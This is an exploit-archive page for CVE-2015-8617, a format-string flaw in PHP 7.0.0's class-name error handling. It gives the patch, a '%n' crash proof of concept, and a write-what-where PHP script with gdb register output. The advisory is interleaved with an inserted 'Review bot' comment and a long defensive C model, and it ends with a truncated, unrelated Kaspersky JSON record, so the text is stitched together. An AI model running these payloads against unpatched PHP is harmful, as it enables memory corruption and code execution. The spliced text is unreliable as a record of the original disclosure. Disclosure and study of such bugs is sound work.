ID 1337DAY-ID-25750 Type zdt Reporter Andrew Kramer Modified 2015-12-23T00:00:00
Description
Exploit for multiple platform in category dos / poc
Overview
--------------------------------------------
A fun little format string vulnerability exists in PHP 7.0.0 due to how
non-existent class names are handled. From my limited research I
believe this issue is likely exploitable for full code execution (see
test script below). This issue does not appear to be present in
previous PHP versions and has been patched in version 7.0.1. If you
build a working exploit, drop me a line, I'd love to see (andrew at
jmpesp dot org). Shout out to the PHP team for fixing this so quickly
and for building a great product. Greetz to my DSU crew.
Timeline
--------------------------------------------
12/11/2015: Discovered
12/12/2015: Reported to PHP team
12/13/2015: Patch accepted and committed
12/17/2015: PHP 7.0.1 released containing patch
12/22/2015: Publicly disclosed
Vulnerability/Patch
--------------------------------------------
diff -rup php-7.0.0_old/Zend/zend_execute_API.c
php-7.0.0_new/Zend/zend_execute_API.c
--- php-7.0.0_old/Zend/zend_execute_API.c 2015-12-01 07:36:25.000000000
-0600
+++ php-7.0.0_new/Zend/zend_execute_API.c 2015-12-12 12:24:24.999391117
-0600
@@ -218,7 +218,7 @@ static void zend_throw_or_error(int fetc
zend_vspprintf(&message, 0, format, va);
if (fetch_type & ZEND_FETCH_CLASS_EXCEPTION) {
- zend_throw_error(exception_ce, message);
+ zend_throw_error(exception_ce, "%s", message);
} else {
zend_error(E_ERROR, "%s", message);
}
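Review bot: The one-line change is the right fix and the smallest one: in the `-` line, `message`, which `zend_vspprintf` has just built from a literal format plus the user-supplied class name, is handed to `zend_throw_error` in the format position, so any `%` sequences in the class name are parsed as directives by the printf engine; the `+` line passes the literal `"%s"` as the format and `message` purely as data, which is exactly what the `zend_error(E_ERROR, "%s", message)` branch below it already did. Two follow-ups worth filing with this patch: a regression test that references a non-existent class whose name contains `%n` and `%s` and asserts a plain `Error` with the name echoed verbatim, and a printf-style format attribute on `zend_throw_error` so that `-Wformat-security` flags any remaining call that passes a non-literal format without arguments.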
Proof of Concept #1 (simple segfault)
--------------------------------------------
<?php $name="%n%n%n%n%n"; $name::doSomething(); ?>
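As an added illustration, not code from the advisory or from PHP itself, the C below models the two stages of zend_throw_or_error() from the patch above and feeds them the class name from Proof of Concept #1. The pre-patch shape is deliberately not executed, since calling a printf-family function with a user-controlled format and no arguments is undefined behaviour; a small audit routine reports what the printf engine would attempt with that string instead, while the patched "%s" shape is run for real. The names throw_error_like, build_message, audit_format and the 256-byte buffers are this example's own assumptions, and PHP's own zend_vspprintf/xbuf_format_converter engine is not reused.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#if defined(__GNUC__)
#define PRINTF_LIKE(f, a) __attribute__((format(printf, f, a)))
#else
#define PRINTF_LIKE(f, a)
#endif

/* What a printf engine would do with a string used in the format position. */
struct format_demand {
    int args;   /* vararg slots the conversions would consume */
    int writes; /* how many of them are %n, i.e. writes through a pointer */
};

/* Walk a string the way printf's parser does, without executing it: every
 * conversion reads one vararg, a '*' width or precision reads another,
 * "%%" reads nothing, and %n stores the byte count through the pointer it
 * reads. This is an audit routine (example code), not a printf clone. */
struct format_demand audit_format(const char *fmt)
{
    struct format_demand d = {0, 0};
    for (const char *p = fmt; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')
            continue;                                 /* literal percent */
        while (*p && strchr("-+ #0", *p)) p++;        /* flags */
        if (*p == '*') { d.args++; p++; }             /* width from vararg */
        else while (*p >= '0' && *p <= '9') p++;
        if (*p == '.') {                              /* precision */
            p++;
            if (*p == '*') { d.args++; p++; }
            else while (*p >= '0' && *p <= '9') p++;
        }
        while (*p && strchr("hlLqjzt", *p)) p++;      /* length modifier */
        if (!*p)
            break;                                    /* truncated "%" */
        d.args++;
        if (*p == 'n')
            d.writes++;
    }
    return d;
}

/* Stand-in for zend_throw_error(): a printf-style sink. The format attribute
 * lets gcc/clang -Wformat-security flag a non-literal format argument. */
static void PRINTF_LIKE(3, 4) throw_error_like(char *out, size_t n, const char *format, ...)
{
    va_list va;
    va_start(va, format);
    vsnprintf(out, n, format, va);
    va_end(va);
}

/* Stage 1 of zend_throw_or_error(): literal format, class name as data.
 * This step is safe in both the old and the patched code. */
static void build_message(char *message, size_t n, const char *class_name)
{
    snprintf(message, n, "Class '%s' not found", class_name);
}

/* Stage 2, pre-patch shape: zend_throw_error(exception_ce, message).
 * The message, which embeds the class name, lands in the format position.
 * Running printf on it would be undefined behaviour, so report what the
 * engine would attempt instead: for PoC #1 that is five %n pointer writes. */
struct format_demand vulnerable_throw_demand(const char *class_name)
{
    char message[256];
    build_message(message, sizeof message, class_name);
    /* throw_error_like(out, n, message);  <- the pre-patch call, never made here */
    return audit_format(message);
}

/* Stage 2, patched shape: zend_throw_error(exception_ce, "%s", message).
 * Returns 1 when the class name reaches the output byte-for-byte, i.e. the
 * printf engine treated it as data rather than as directives. */
int fixed_throw_preserves_name(const char *class_name)
{
    char message[256], out[256];
    build_message(message, sizeof message, class_name);
    throw_error_like(out, sizeof out, "%s", message);
    return strcmp(out, message) == 0 && strstr(out, class_name) != NULL;
}

int main(void)
{
    const char *poc1 = "%n%n%n%n%n"; /* class name from Proof of Concept #1 */
    struct format_demand d = vulnerable_throw_demand(poc1);
    printf("pre-patch: %d varargs consumed, %d pointer writes\n", d.args, d.writes);
    printf("patched: name preserved verbatim = %d\n", fixed_throw_preserves_name(poc1));
    return 0;
}
```

Build with gcc -Wall -Wformat-security; because throw_error_like carries the format attribute, uncommenting the pre-patch call produces the "format not a string literal and no format arguments" warning, which is the compile-time check that would have caught the original bug before it shipped.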
Proof of Concept #2 (write-what-where primitive)
--------------------------------------------
andrew@thinkpad /tmp/php-7.0.0_64 % cat /tmp/test.php
<?php
ini_set("memory_limit", "4G"); // there's probably a much cleaner way to do this
$rdx = 0x42424242; // what
$rax = 0x43434343; // where
$name = "%" . ($rdx - 8) . "d" . "%d" . "%n" . str_repeat("A", ($rax -
34)); // your offsets may differ.
$name::doSomething();
?>
andrew@thinkpad /tmp/php-7.0.0_64 % gdb sapi/cli/php
GNU gdb (GDB) 7.10
Copyright (C) 2015 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-unknown-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from sapi/cli/php...done.
(gdb) r /tmp/test.php
Starting program: /tmp/php-7.0.0_64/sapi/cli/php /tmp/test64.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x0000000000672935 in xbuf_format_converter
(xbuf=xbuf@entry=0x7fffffffa610, is_char=is_char@entry=1 '\001',
fmt=<optimized out>, ap=0x7fffffffa658)
at /tmp/php-7.0.0_64/main/spprintf.c:744
744 *(va_arg(ap, int *)) = is_char? (int)((smart_string *)xbuf)->len : (int)ZSTR_LEN(((smart_str *)xbuf)->s);
(gdb) i r
rax 0x43434343 1128481603
rbx 0x7fffb2800016 140736188121110
rcx 0x6e 110
rdx 0x42424242 1111638594
rsi 0x7fffffff9db0 140737488330160
rdi 0x7fffffffa658 140737488332376
rbp 0x1 0x1
rsp 0x7fffffff9d50 0x7fffffff9d50
r8 0x7fffffff9db0 140737488330160
r9 0x7fffb2800016 140736188121110
r10 0x0 0
r11 0x0 0
r12 0x20 32
r13 0x7fffffffa610 140737488332304
r14 0x0 0
r15 0x4242423a 1111638586
rip 0x672935 0x672935 <xbuf_format_converter+1845>
eflags 0x10202 [ IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) x/1i $rip
=> 0x672935 <xbuf_format_converter+1845>: mov DWORD PTR [rax],edx
(gdb)
# 0day.today [2018-04-08] #
Reference
--------------------------------------------
CVE-2015-8617 (NVD, CWE-134): Format string vulnerability in the zend_throw_or_error function in Zend/zend_execute_API.c in PHP 7.x before 7.0.1 allows remote attackers to execute arbitrary code via format string specifiers in a string that is misused as a class name, leading to incorrect error handling. CVSS v3.0 base score 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 base score 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8617
Also published as Exploit-DB EDB-ID:39082: https://www.exploit-db.com/exploits/39082/
"description": "### *Detect date*:\n01/19/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nObsolete version of PHP was found in XAMPP & WAMP. Details about PHP vulnerabilities you can get at KLA10746.\n\n### *Affected products*:\nPHP 7 versions earlier than 7.0.2 \nPHP 5.6 versions earlier than 5.6.17 \nPHP versions earlier than 5.5.31\n\n### *Solution*:\nUpdate XAMPP or WAMP if vendor released corresponding patch or update PHP module individually. \n[WAMP downloads page](<http://www.wampserver.com/en/>) \n[XAMPP downloads page](<https://www.apachefriends.org/download.html>)\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[PHP](<https://threats.kaspersky.com/en/product/PHP/>)\n\n### *CVE-IDS*:\n[CVE-2016-1904](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1904>)7.5Critical \n[CVE-2016-1903](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1903>)6.4High \n[CVE-2015-8617](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8617>)10.0Critical \n[CVE-2015-8616](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8616>)7.5Critical \n[CVE-2015-6836](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6836>)7.5Critical \n[CVE-2015-6833](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6833>)5.0Critical \n[CVE-2015-6832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6832>)7.5Critical \n[CVE-2015-6831](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6831>)7.5Critical \n[CVE-2015-6527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6527>)7.5Critical \n[CVE-2015-5590](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5590>)7.5Critical", "edition": 43, "modified": "2020-05-22T00:00:00", "published": "2016-01-19T00:00:00", "id": "KLA10747", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10747", "title": "\r KLA10747Obsolete PHP version in XAMPP & WAMP ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}